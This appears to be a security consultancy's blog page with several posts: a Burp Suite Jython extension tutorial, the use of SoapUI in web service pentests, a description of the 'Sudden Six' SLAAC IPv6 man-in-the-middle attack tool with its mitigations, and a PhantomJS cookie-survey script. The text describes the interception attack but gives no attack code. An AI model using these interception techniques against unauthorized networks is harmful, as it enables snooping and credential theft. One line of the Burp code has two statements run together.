    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.
A request has been processed and modified by the extension. Since Burp doesn't currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension's tab.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes a an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

jython_interpreter

This shell was originally intended to work with the classes and objects defined jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

jython_shell1

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services . SoapUI Pro even includes a variety of web-service specific payloads for security testing.

SoapUI

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducability for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a "proper" WSDL or service description by telling SoapUI it's a REST service.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are a tons of tools out there, including official Burp examples, burpextensions.com, and findable on github. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Picking Up The SLAAC With Sudden Six

By Brent Bandelgar and Scott Behrens

The people that run The Internet have been clamoring for years for increased adoption of IPv6, the next generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were ‘out of the box’ configured to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this IPv6 host router first, which would then resend the requests along to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.

Windows 8 on Sudden Six

Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that only have IPv4 connectivity and do not have IPv6 infrastructure and defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Attackers may take advantage of Operating Systems that prefer IPv6 traffic to force those hosts to route their traffic over our IPv6 infrastructure so they can intercept and modify that communication.

To boil it down, attackers can conceivably (and fairly easily) weaponize an attack on our systems simply by leveraging this vulnerability. They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine. Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).

As an example, we can imagine this type of attack being used to snoop on web traffic from employees browsing web sites. Even more lethal, the attackers could modify web pages to launch client-side attacks.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be accomplished manually in each Network Adapter Properties panel or with GPO. Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. This includes using features such as RA Guard, which allows administrators to configure a trusted switch port that will accept IPv6 Router Advertisement packets, indicating the legitimate IPv6 router.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes an API for JavaScript for command execution.  I was able to build on this script to build out a list of active and inactive URLs by checking the status callback from page.open and capture the cookies from every active URL as stored in page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.OnUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
# output JSON of cookies from page, one JSON string per line
# format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.